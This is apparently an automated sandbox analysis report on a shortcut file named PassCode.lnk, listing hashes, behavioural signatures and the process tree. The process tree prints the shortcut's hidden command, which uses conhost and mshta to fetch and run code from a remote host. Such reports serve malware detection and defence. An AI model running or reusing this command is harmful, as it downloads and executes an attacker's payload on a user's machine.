Analysis
-
max time kernel
50s -
max time network
184s -
platform
windows10-1703_x64 -
resource
win10-20220901-en -
resource tags
arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system -
submitted
15-02-2023 04:16
Static task
static1
Behavioral task
behavioral1
Sample
PassCode.lnk
Resource
win10-20220901-en
windows10-1703-x64
2 signatures
300 seconds
Behavioral task
behavioral2
Sample
PassCode.lnk
Resource
win7-20221111-en
windows7-x64
2 signatures
300 seconds
General
-
Target
PassCode.lnk
-
Size
2KB
-
MD5
2e4ea31a8afa6afdb0c3717909f437e3
-
SHA1
a85e0da953ed18006cd60feb656df1f945b94ec7
-
SHA256
1b2c8c71a9c38266748526ae2febea2f48cad7896532f3481fb6d1790bf6e372
-
SHA512
0c1f43380fe11a35fec9a28932358932f40cfec566c1000af94d0d7d6d440c098b61d52d836bcf155f45cfb87181f05aed4a6f2094a018ebc238124b7262c033
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 5096 wrote to memory of 3396 5096 cmd.exe 67 PID 5096 wrote to memory of 3396 5096 cmd.exe 67
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\PassCode.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:5096 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" mshta https://down.tomming.us/iY3zCHGTmYj/4BdfzDhGZW/ROBSa5DDb5/kGuSvL2aT0/V2iMA09U5B/Cvw%3D%3D2⤵PID:3396
-